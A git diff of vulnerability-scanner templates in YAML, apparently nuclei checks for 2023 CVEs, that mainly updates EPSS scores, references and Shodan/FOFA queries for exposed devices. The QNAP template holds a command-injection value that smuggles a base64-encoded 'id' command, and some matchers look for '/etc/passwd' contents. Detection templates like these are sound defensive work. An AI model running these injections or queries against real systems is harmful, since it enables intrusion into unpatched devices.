4a0a0047304502207f826adf0d940782fb53c8bc4a06f53a4735b9231586bf8c8b26306e06b521b0022100ebe60a3c7c67085fab3cb503a91f7b59e5bb9148ae8ec4682025a107d73c1285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f15c1bb56b22ab2f94529ddca1c0a06cbc06f0e07a1f56077c32b99e2c866bad022100b538a78680a96bcac30de2427b9197fa07b3502b9bf71699a5c9e5c50a88ac08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index 3d03d31d2d..0e57b6db91 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -10,20 +10,24 @@ info: - https://github.com/20142995/sectool - https://github.com/tanjiti/sec_profile - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md + - https://vuldb.com/?ctiid.238047 + - https://vuldb.com/?id.238047 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-4542 cwe-id: CWE-78 - epss-score: 0.00067 - epss-percentile: 0.29155 + epss-score: 0.90977 + epss-percentile: 0.9884 cpe: cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:* metadata: - vendor: dlink - product: dar-8000-10_firmware - fofa-query: body="DAR-8000-10" && title="D-Link" verified: true max-request: 1 + vendor: dlink + product: dar-8000-10_firmware + fofa-query: + - body="DAR-8000-10" && title="D-Link" + - body="dar-8000-10" && title="d-link" tags: cve,cve2023,dlink http: @@ -46,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc92305d342eed9bff2b49941c87cd9a974ab188c2908ff7bd7f23c4c8f0e2b70220122a54ccac0cf268d09ddecb89e8e8ac1b923dda7db8174e58415bb32e9aaea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b3fb8f525f0694ccb8676f31859b245d7a2c5d2cdd98bf70624e863c2b02d570221008b136d5eccdd29859129ffed2b11f046e85bed6867a80bec6b5a9927f5dcb1e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml index 1c04c62437..fc2dfa7bad 100644 --- a/http/cves/2023/CVE-2023-4547.yaml +++ b/http/cves/2023/CVE-2023-4547.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4547 cwe-id: CWE-79 - epss-score: 0.00205 - epss-percentile: 0.58464 + epss-score: 0.0025 + epss-percentile: 0.6492 cpe: cpe:2.3:a:spa-cart:ecommerce_cms:1.9.0.3:*:*:*:*:*:*:* metadata: verified: "true" @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203881baea28e873f7b5ad584cb004cc063a9d3ef0dee49650fe7b62fc6d7ffec9022100be7a7ade3690efb97076067dc73377ad9a8478b836576bc79de4f0ffc9df4190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029cda6ad135bffafeee5ebf0105becd915cfd86c8f9c3d8f7e80614706e35e3c02207ac440100d7b051e5d940d8a47729ba666c07b91ea0048467fcd5bc5b054a142:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45542.yaml b/http/cves/2023/CVE-2023-45542.yaml index de835a8516..6d565cea8d 100644 --- a/http/cves/2023/CVE-2023-45542.yaml +++ b/http/cves/2023/CVE-2023-45542.yaml @@ -16,13 +16,15 @@ info: cve-id: CVE-2023-45542 cwe-id: CWE-79 epss-score: 0.00082 - epss-percentile: 0.33567 + epss-percentile: 0.34845 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moosocial + shodan-query: http.favicon.hash:"702863115" + fofa-query: icon_hash="702863115" tags: cve2023,cve,xss,moosocial http: @@ -37,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 4a0a00473045022100de148fe4e6242e6abc19d6fe4f2669b68922af5ebaa974d857cab105774563380220725cdbee34b4e77e346808179b3b069fc13c9ddd462fc0c2e4d0ead40654f5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022050d66c74e9df8882762bfc2f88213f3ebb8a9d022a161abc14b7fe226651f90a022100ddb93a8f08d2392952d72477e8e791070dfe68bff1adcf671ff9e92a79541cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45671.yaml b/http/cves/2023/CVE-2023-45671.yaml index c5b8633606..5730ad8670 100644 --- a/http/cves/2023/CVE-2023-45671.yaml +++ b/http/cves/2023/CVE-2023-45671.yaml @@ -10,17 +10,25 @@ info: reference: - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f - https://nvd.nist.gov/vuln/detail/CVE-2023-45671 + - https://securitylab.github.com/advisories/GHSL-2023-190_Frigate/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.7 cve-id: CVE-2023-45671 - cpe: cpe:2.3:a:frigate:frigate:0.13.0:beta1:*:*:*:*:*:* + cwe-id: CWE-79 + epss-score: 0.00924 + epss-percentile: 0.82924 + cpe: cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: frigate product: frigate - shodan-query: title:"Frigate" + shodan-query: + - title:"Frigate" + - http.title:"frigate" + fofa-query: title="frigate" + google-query: intitle:"frigate" tags: cve,cve2023,frigate,xss http: @@ -35,4 +43,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 404' condition: and -# digest: 490a00463044022072f73c6b300dc9b4e94b56e4753b236e144171f0420af4af0c13097305edae9e02206f5f7b3429e24d9476d31c541f16ad723124a4d8759358b86c67b9e96043b3e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071053f9a6de1222144454acc010971215e52394fcf6105fad79729a4bab85587022100baca03fa65958de7da8455d4a8dbaba6456f951629aa6cc24a4acf9046f10ef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index e8da8a88ed..26c8efe30a 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -16,15 +16,23 @@ info: cvss-score: 6.5 cve-id: CVE-2023-4568 cwe-id: CWE-287 - epss-score: 0.00254 - epss-percentile: 0.6331 + epss-score: 0.02217 + epss-percentile: 0.89475 cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: papercut product: papercut_ng - shodan-query: html:"content=\"PaperCut\"" + shodan-query: + - html:"content=\"PaperCut\"" + - http.html:'content="papercut' + - cpe:"cpe:2.3:a:papercut:papercut_ng" + - http.html:"content=\"papercut\"" + fofa-query: + - body='content="papercut' + - body="content=\"papercut\"" + google-query: html:'content="papercut' tags: cve2023,cve,unauth,papercut http: @@ -53,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025b4e549e5cbd393beb59ce312d7a29bca8d0ab3b16c64fcf93b2ff8aa4875d0022100bd23ccd1b14160f48ab3c24a399e2817f0d49b50869d7cc20c63a6f9a5c35920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022061af53e49ff89431b21f4c73cd1766d421c1956e6e5833ffe4d4d03ca6d4f1dd022100a256d63fc52f62aef89b997b4fcf912d447e2b0aeddd53e8f74a767d5485ff0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 051ed6b3d3..176e734a92 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -17,16 +17,21 @@ info: cvss-score: 9.8 cve-id: CVE-2023-45852 cwe-id: CWE-77 - epss-score: 0.09217 - epss-percentile: 0.94519 + epss-score: 0.10555 + epss-percentile: 0.95011 cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: viessmann product: vitogate_300_firmware - shodan-query: title:"Vitogate 300" - fofa-query: title="Vitogate 300" + shodan-query: + - title:"Vitogate 300" + - http.title:"vitogate 300" + fofa-query: + - title="Vitogate 300" + - title="vitogate 300" + google-query: intitle:"vitogate 300" tags: cve2023,cve,rce,vitogate,viessmann http: @@ -45,4 +50,4 @@ http: - 'contains_all(header, "application/json")' - 'contains_all(body, "traceroute: {{randstr}}: Unknown host", "daemon:x:1:1:")' condition: and -# digest: 4b0a0048304602210081c3ca1a9aa062b68de5767bf7196688722aa953aa66d1d2cb1bdc3f923cbe83022100d963ef7152e0de5b68eb3b89bfd22b0989532ba9aa9a5682f2e08f7f39c0c4ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f884c1a55710461c1a5f7dd21865ee459c81c817395cd3c2539d54683232e62702203f9ce7cb48966c4084a4d1fa1cf1e3696ce3af032290e6e3faf0a540b9ad0d7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index 60276771a7..3bfaada1ba 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -13,18 +13,21 @@ info: reference: - https://github.com/SunshineOtaku/Report-CVE/blob/main/qdPM/9.2/Directory%20Traversal.md - https://nvd.nist.gov/vuln/detail/CVE-2023-45855 + - https://qdpm.net classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-45855 cwe-id: CWE-22 - epss-score: 0.00087 - epss-percentile: 0.35946 + epss-score: 0.00318 + epss-percentile: 0.70433 cpe: cpe:2.3:a:qdpm:qdpm:9.2:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: qdpm product: qdpm - shodan-query: http.favicon.hash:762074255 + shodan-query: "http.favicon.hash:762074255" + fofa-query: "icon_hash=762074255" tags: cve,cve2023,qdpm,lfi http: @@ -44,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cbd700fb07947d7ab0657ac97cf57a41ceb390ba95b91f5ebd3eb5dc4ed2246b02210086b07d8dd2293a1fc75a3d80d0c9dcf34ddff95b979e4eccefddd9d1fc606ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e56df1cdf4a2f95836eef15fe7159b16232539b6130847915ca391722b2fda6a022100883868300f7d168a5617d481ba299432509133ebbdc32149a7ead90350e95cb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml index 26ca18e549..1784eb8b73 100644 --- a/http/cves/2023/CVE-2023-4596.yaml +++ b/http/cves/2023/CVE-2023-4596.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4596 cwe-id: CWE-434 - epss-score: 0.08202 - epss-percentile: 0.93732 + epss-score: 0.07197 + epss-percentile: 0.94017 cpe: cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,9 +26,12 @@ info: vendor: incsub product: forminator framework: wordpress - publicwww-query: /wp-content/plugins/Forminator + shodan-query: http.html:/wp-content/plugins/forminator + fofa-query: body=/wp-content/plugins/forminator + publicwww-query: + - /wp-content/plugins/Forminator + - /wp-content/plugins/forminator tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub - variables: string: "CVE-2023-4596" @@ -119,4 +122,4 @@ http: regex: - 'name="form_id" value="([0-9]+)">' internal: true -# digest: 490a0046304402200a1c235894179ebe8c3f66906af4a98bd5c47e1557fc2d02ce2971dcddf24dd702201951b001521e150f7c417b8bb7f6337c057342b9078fde8029f33a33a7306e1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022070dc193749f022e275bc9e3088894ea4afbaf6a94fb3f69105f67c63de7db08502210084147b4af64481e2756f95e326afa7e6d43c2c86e2ffcf85939cda69f0037071:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 91e3ac4e08..90ada3df16 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4634 cwe-id: CWE-73 - epss-score: 0.02012 - epss-percentile: 0.88618 + epss-score: 0.01686 + epss-percentile: 0.87686 cpe: cpe:2.3:a:davidlingren:media_library_assistant:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: davidlingren product: media_library_assistant framework: wordpress + shodan-query: http.html:wp-content/plugins/media-library-assistant + fofa-query: body=wp-content/plugins/media-library-assistant publicwww-query: "wp-content/plugins/media-library-assistant" tags: cve,cve2023,packetstorm,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant,davidlingren @@ -49,4 +51,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4a0a00473045022100e549b41871d31392747cdd52ed45cbab5066b928e541fe6d1cd3e586fd1e3d0402205038b8281f90eead08d25ddf1e5281bf5dfd5463c328381896bd01903596e39e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fcc2fc055a5da201109bade2e7fdeddede95aeb7a188fab06c3456e5399efa88022037681d07e7726e39aabe7ed62f0f31aea09f562101fd5bc4b0f84e32dacb6cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 53c778381e..bd7eabbed8 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -14,8 +14,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-46347 cwe-id: CWE-89 - epss-score: 0.00076 - epss-percentile: 0.31923 + epss-score: 0.04018 + epss-percentile: 0.92057 cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: product: ndk_steppingpack framework: prestashop shodan-query: http.component:"prestashop" - tags: cve,cve2023,sqli,prestashop,ndk_steppingpack + tags: cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign http: - raw: @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(header, "PrestaShop")' condition: and -# digest: 4a0a00473045022100ba7f8d681eec29e6dd0682484b99bef70ea6763f14489f9b94b59485933301e102202d939b5e05c4199a2ae937c418c2dd3947f86b5a14d3ea6ac0fc0defe7065e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100edb938c16e344ea5241331746ddd7d3beaf4136dc6a8ca73d4e3ab60ba16446a02201ba5a444f090a2039229ce16ec441aa48e4bc23d96759573c322f73252509c5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index 7aeae95268..72532b378d 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -10,15 +10,24 @@ info: reference: - https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/ - https://nvd.nist.gov/vuln/detail/CVE-2023-46359 + - http://hardy.com + - https://github.com/d4n-sec/d4n-sec.github.io + - https://github.com/fkie-cad/nvd-json-data-feeds classification: - cvss-metrics: CVSS:3.1/AV:A/AC:N/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.6 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2023-46359 + cwe-id: CWE-78 + epss-score: 0.1382 + epss-percentile: 0.95642 + cpe: cpe:2.3:h:hardy-barth:cph2_echarge:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: hardy-barth + product: cph2_echarge shodan-query: html:"Salia PLCC" - tags: cve2023,cve,salia-plcc,cph2,rce + tags: cve2023,cve,salia-plcc,cph2,rce,hardy-barth http: - method: GET @@ -37,4 +46,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4a0a0047304502203fa3579cee7f457c57f4c570aec49072afb073eb3669f6d1ce3fae59bda5bca8022100c56de69f4564bd736a8ec6c9c10256a835946eea129a254373943592eee6e773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022003775ef2a134d4519b3079ec9f841daab7400a75283fd00c55fe1b36b2676b3c022100a98642834c2f00bf26a4f70df68eb4239a8b8b0477d4d37bd70fc987113413f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 7406de95e5..4fe591ede5 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -17,15 +17,19 @@ info: cvss-score: 9.8 cve-id: CVE-2023-46574 cwe-id: CWE-77 - epss-score: 0.05804 - epss-percentile: 0.9323 + epss-score: 0.20185 + epss-percentile: 0.96341 cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: totolink product: a3700r_firmware - shodan-query: title:"Totolink" + shodan-query: + - title:"Totolink" + - http.title:"totolink" + fofa-query: title="totolink" + google-query: intitle:"totolink" tags: cve,cve2023,totolink,router,iot,rce http: @@ -58,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cec6143c8e148bcc11dd54548c3052458b343eb437ff02989f587d6b10a8ef100220443a97a1f7f060d356652fa2ee6c51d593fba94809abfbec6d342e6db08e8167:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100960438be8181e672812559f001beb25f081c663ede398df64cafc392da90ef6e022029d6c871ffe22a626d1540c3ac88b5e9809783bbc0672eab80664a24e9540c84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index d7ded59e4a..95a49563b2 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -17,15 +17,19 @@ info: cvss-score: 9.8 cve-id: CVE-2023-46747 cwe-id: CWE-306,CWE-288 - epss-score: 0.97202 - epss-percentile: 0.99806 + epss-score: 0.97116 + epss-percentile: 0.9979 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 7 vendor: f5 product: big-ip_access_policy_manager - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + shodan-query: + - http.title:"BIG-IP®-+Redirect" +"Server" + - http.title:"big-ip®-+redirect" +"server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: cve2023,cve,packetstorm,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev variables: username: "{{hex_encode(rand_base(5))}}" @@ -103,4 +107,4 @@ http: - "commandResult" - "uid=" condition: and -# digest: 4a0a0047304502200631280cc82577d9f04af6a40e44cc38fb51e389f5af5a180e0e4eda44442ef102210091b6ea9b756def972bfe043e90ead64bddc58fbdaf68ccec09743b77a0a2883e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205694cf84f8014a16b1c92e95285d308240617c0fd9de7735b25f774e11dd629502206ec25efde8e95f07226eabdf1224798a2cf8e0381619bc127b2ff565e5599e5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml index 996e6d04f4..f123a46756 100644 --- a/http/cves/2023/CVE-2023-46805.yaml +++ b/http/cves/2023/CVE-2023-46805.yaml @@ -16,15 +16,17 @@ info: cvss-score: 8.2 cve-id: CVE-2023-46805 cwe-id: CWE-287 - epss-score: 0.96274 - epss-percentile: 0.99497 + epss-score: 0.96558 + epss-percentile: 0.99613 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: ivanti product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" - tags: cve,cve2023,kev,auth-bypass,ivanti + fofa-query: body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" + tags: packetstorm,cve,cve2023,kev,auth-bypass,ivanti http: - raw: @@ -54,4 +56,4 @@ http: - 'contains(body_2, "block_message")' - 'contains(header_2, "application/json")' condition: and -# digest: 4a0a00473045022100d20c5dc0052826ea14f0dff2969048d96672f04b90e75cb43a55f82c0cdf9b9902203f2a6f982a2068da15545263b3a76ce341cbca2cd7c16dc3d0a16e8f9bd283bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204ce6f60ef24fce30190ea7ba01627fbca1aed1ae80b11b7f5735c74db013d020022100b21ef93a501b8278f0621f6eb80984f16f66275b761b45d67834eeaeae10b8b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 0992e66fc7..7a647f67d5 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4714 cwe-id: CWE-200 - epss-score: 0.50923 - epss-percentile: 0.9748 + epss-score: 0.68074 + epss-percentile: 0.97962 cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:* metadata: verified: true @@ -52,4 +52,4 @@ http: part: body regex: - 'key: "([a-z_A-Z0-9]+)"' -# digest: 4a0a0047304502207eb10bbaaa9606985258a5fcc9285e6588b5043561e22bf71d534354f33b32d1022100f2f9202c1144fa3549e6f9370b54451d794f24d2cf391fdc9a83fbb2fb76db55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c49434d3219e961bf9b3a2986f638e7217defeb346998ca398332577bb611a360220485c16c30e0970e454110ae41a21d5031534d48c954adceb05a6f5f92ba5f568:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml index deccc8b7f6..86ebefb8fb 100644 --- a/http/cves/2023/CVE-2023-47211.yaml +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -16,14 +16,18 @@ info: cve-id: CVE-2023-47211 cwe-id: CWE-22 epss-score: 0.00164 - epss-percentile: 0.52059 + epss-percentile: 0.52964 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: zohocorp product: manageengine_firewall_analyzer - shodan-query: "http.title:\"OpManager Plus\"" - tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive + shodan-query: + - "http.title:\"OpManager Plus\"" + - http.title:"opmanager plus" + fofa-query: title="opmanager plus" + google-query: intitle:"opmanager plus" + tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp http: - raw: @@ -114,4 +118,4 @@ http: regex: - 'Set-Cookie: opmcsrfcookie=([^;]{50,})' internal: true -# digest: 490a00463044022065e6f603f0e38ded5d6d7d64b26a3c4f033fe991d1b0bd52647d1f06a8b848de02204921a44eff428087946e64109d72ce0cb050c7167e6d3b2fa2eded319790416b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207463b57de77e273b29f35ef339d53a9d18d09b98c545fbfb4a406e3f06c8ce3b0220333ec1305069fb86c3b10d5887bdf0152765f1cf7b49c2907697875e3c10563c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47218.yaml b/http/cves/2023/CVE-2023-47218.yaml index ca420a4377..2239074621 100644 --- a/http/cves/2023/CVE-2023-47218.yaml +++ b/http/cves/2023/CVE-2023-47218.yaml @@ -3,7 +3,7 @@ id: CVE-2023-47218 info: name: QNAP QTS and QuTS Hero - OS Command Injection author: ritikchaddha - severity: high + severity: medium description: | An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later. reference: @@ -11,17 +11,19 @@ info: - https://twitter.com/win3zz/status/1760224052289888668/photo/3 - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/ - https://nvd.nist.gov/vuln/detail/CVE-2023-47218 + - https://www.qnap.com/en/security-advisory/qsa-23-57 classification: - cvss-metrics: CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 8.3 - cwe-id: CWE-78 + cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 5.8 cve-id: CVE-2023-47218 + cwe-id: CWE-77 + epss-score: 0.00305 + epss-percentile: 0.69699 metadata: verified: true max-request: 2 shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS" tags: cve,cve2023,qnap,qts,quts,rce,intrusive - variables: file: '{{rand_base(6)}}' cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22' @@ -51,4 +53,4 @@ http: - 'contains_all(body_2, "uid=", "gid=")' - 'status_code == 200' condition: and -# digest: 490a0046304402207c91f6f27dabb2e8ec3158c1c5677a2697bf0aac61c9f7fc4f5809796f63aa65022019831152413abfd5beccfb0ff90a9c194a5ac90dec6f7b4f781be1a395042786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec7d20f744003a1c2ed7444be98278cc629581cb5099e4b67f6e133003420223022100d3c72e77322b2b66a8cbdbb608afe345f84e1fb986d6f09ec3be65cb6654952c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47246.yaml b/http/cves/2023/CVE-2023-47246.yaml index 44cfc8776b..0afdb3ad93 100644 --- a/http/cves/2023/CVE-2023-47246.yaml +++ b/http/cves/2023/CVE-2023-47246.yaml @@ -19,15 +19,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-47246 cwe-id: CWE-22 - epss-score: 0.94354 - epss-percentile: 0.99149 + epss-score: 0.94622 + epss-percentile: 0.99239 cpe: cpe:2.3:a:sysaid:sysaid_on-premises:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: sysaid product: sysaid_on-premises - shodan-query: http.favicon.hash:1540720428 + shodan-query: + - http.favicon.hash:1540720428 + - http.favicon.hash:"1540720428" fofa-query: icon_hash="1540720428" tags: cve,cve2023,sysaid,rce,kev,traversal,intrusive variables: @@ -50,4 +52,4 @@ http: - type: dsl dsl: - "contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200" -# digest: 4a0a00473045022003e7cfbeaa7a27cda4e39ced19bbf29d6114eb4e89c148c4d8f8956a1fc8796b022100dadf8e853bb7b440bac6e0475e4644ee0df1cd1950b066f615e41d2202000f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220337201087c74967a30ba3ce31445932ecdc2584314ba068984d047bd6d1ef04f02206a74c3228b19ba3cb1a4d2a443090fecd9996fc1cdac174a51390ea4f2267ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47643.yaml b/http/cves/2023/CVE-2023-47643.yaml index da286fdd08..e939213f39 100644 --- a/http/cves/2023/CVE-2023-47643.yaml +++ b/http/cves/2023/CVE-2023-47643.yaml @@ -13,20 +13,26 @@ info: reference: - https://github.com/salesagility/SuiteCRM-Core/security/advisories/GHSA-fxww-jqfv-9rrr - https://nvd.nist.gov/vuln/detail/CVE-2023-47643 + - https://www.apollographql.com/blog/graphql/security/why-you-should-disable-graphql-introspection-in-production/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-47643 cwe-id: CWE-200 - epss-score: 0.00063 + epss-score: 0.06214 + epss-percentile: 0.93569 cpe: cpe:2.3:a:salesagility:suitecrm:8.4.1:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - product: suitecrm vendor: salesagility - shodan-query: title:"SuiteCRM" - tags: cve,cve2023,graphql,suitecrm,introspection + product: suitecrm + shodan-query: + - title:"SuiteCRM" + - http.title:"suitecrm" + fofa-query: title="suitecrm" + google-query: intitle:"suitecrm" + tags: cve,cve2023,graphql,suitecrm,introspection,salesagility http: - raw: @@ -64,4 +70,4 @@ http: regex: - 